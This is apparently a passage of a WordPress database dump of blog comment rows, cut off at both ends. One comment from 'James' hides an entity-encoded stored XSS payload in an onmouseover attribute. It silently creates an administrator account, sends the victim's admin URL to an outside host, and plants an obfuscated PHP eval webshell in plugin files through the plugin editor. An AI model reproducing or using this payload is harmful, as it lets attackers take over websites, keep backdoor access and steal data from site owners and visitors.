040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(147, 1, 'James', 'gqapwgoa@gmail.com', 'http://www.facebook.com/wraaaonte8lz', '220.213.228.173', '2015-11-10 16:05:39', '2015-11-10 16:05:39', 'Hi nice ar Gtrz<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#0